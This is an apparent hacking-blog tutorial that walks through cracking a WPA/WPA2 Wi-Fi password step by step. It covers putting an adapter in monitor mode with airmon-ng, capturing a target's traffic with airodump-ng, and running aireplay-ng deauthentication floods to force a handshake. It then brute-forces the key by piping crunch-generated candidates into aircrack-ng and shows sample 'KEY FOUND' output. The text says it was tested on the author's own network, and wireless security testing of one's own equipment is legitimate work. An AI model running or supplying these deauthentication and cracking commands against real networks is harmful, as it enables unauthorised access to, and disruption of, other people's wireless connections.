Cracking Wireless Router Using Aircrack-ng with crunch

Cracking Wireless Router Using Aircrack-ng with crunch

Welcome to HackingVision, today I will show you how to crack a wireless WPA/WPA2 router using Aircrack-ng and crunch.

First off this is tested on my own home network. I don’t advise hacking anyone else’s WiFi but your own.

First, we need to put our wireless adaptor into monitor mode. Monitor mode / RFMON mode, enabling monitor mode allows a computer with a wireless network interface controller to monitor all traffic received from the wireless network. Unlike promiscuous mode, which is also used for packet sniffing, monitor mode allows packets to be captured without having to associate with any access point or ad hoc network first.

Let’s find out the name of our wireless cards interface. Your card will often be listed in Kali Linux as wlan0 or if using USB wifi like me you can use the ifconfig to find out.

# ifconfig



Now that we know the name of our wireless interface we need to put our wireless card into to monitor mode with airmon-ng start wlan1.

# airmon-ng start wlan1

Now the wireless interface wlan1 will be put in to monitor mode. We can check if our wireless interface is in monitor mode by using ifconfig.

# ifconfig

As you see in the screenshot above we now have a wireless interface called wlan1mon this tells us that airmon-ng has successfully put out wireless card into monitor mode. Now we can use airodump-ng wlan1mon to find information about wifi signals such as BSSID and the wireless channel the target wireless network is running on.

And the output.

For this tutorial, I’ll be attacking my own wireless access point cablecomm-camget4. Once we have found a target wireless network we need to copy the BSSID of the wireless network. Open a new terminal and type airodump-ng –bssid  the BSSID of the network -c the channel of the network mines channel 1 –write the essid of the network CableComm-CamGet4. Essid is the target networks wireless interface name. Your command should look like this airodump-ng –bssid 00:23:BE:47:3C:93 -c1 –write CableComm-CamGet4 wlan1mon.

# airodump-ng –bssid 00:23:BE:47:3C:93 -c1 –write CableComm-CamGet4 wlan1mon

Now its time to get the handshake this is the fun part. I’m going to show you two different ways to do this.

The frist one is.

aireplay-ng –deauth 10000 -a 00:23:BE:47:3C:93 wlan1mon for the main network

# aireplay-ng –deauth 10000 -a 00:23:BE:47:3C:93 wlan1mon

The second one is.

aireplay-ng –deauth 10000 -a 00:23:BE:47:3C:93 -c AC:22:0B:43:5B:D3 wlan1mon or use the -c  for the  client of the network

# aireplay-ng –deauth 10000 -a 00:23:BE:47:3C:93 -c AC:22:0B:43:5B:D3 wlan1mon

Or you can do what i do and run the two attacks a alongside each other.

Now we need to wait for the handshake from the client.

If you don’t have any wordlists available you can generate wordlists using Crunch.


# crunch 4 20 abcdefghijklmnopqustuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | aircrack-ng CableComm-CamGet4-02.cap -e CableComm-CamGet4  -w-

Piping crunch with aircrack can save you time using word-lists.

Now its time to open the CAP file to crack the password. if your wondering what a CAP file is CAP stands for Packet Capture. CAP files hold raw data collected by the sniffing programs. CAP files can be analyzed at a later time or with another program.


aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 CAPfile.cap
Option Description
-w The name of the dictionary file
-b The MAC address of the access point
CAPfile.cap The name of the file that contains the authentication handshake
                         Aircrack-ng 1.2 beta3 r2393

                   [00:08:11] 548872 keys tested (1425.24 k/s)

                           KEY FOUND! [ 987654321 ]

      Master Key    : 5C 9D 3F B6 24 3B 3E 0F F7 C2 51 27 D4 D3 0E 97 
                       CB F0 4A 28 00 93 4A 8E DD 04 77 A3 A1 7D 15 D5 

      Transient Key : 3A 3E 27 5E 86 C3 01 A8 91 5A 2D 7C 97 71 D2 F8 
                       AA 03 85 99 5C BF A7 32 5B 2F CD 93 C0 5B B5 F6 
                       DB A3 C7 43 62 F4 11 34 C6 DA BA 38 29 72 4D B9 
                       A3 11 47 A6 8F 90 63 46 1B 03 89 72 79 99 21 B3 

      EAPOL HMAC    : 9F B5 F4 B9 3C 8B EA DF A0 3E F4 D4 9D F5 16 62


Let aircrack run and there ya go .. crunch can be piped with a number of tools like Hashcat , John most and other brute-force tools included in Kali Linux and Parrot OS.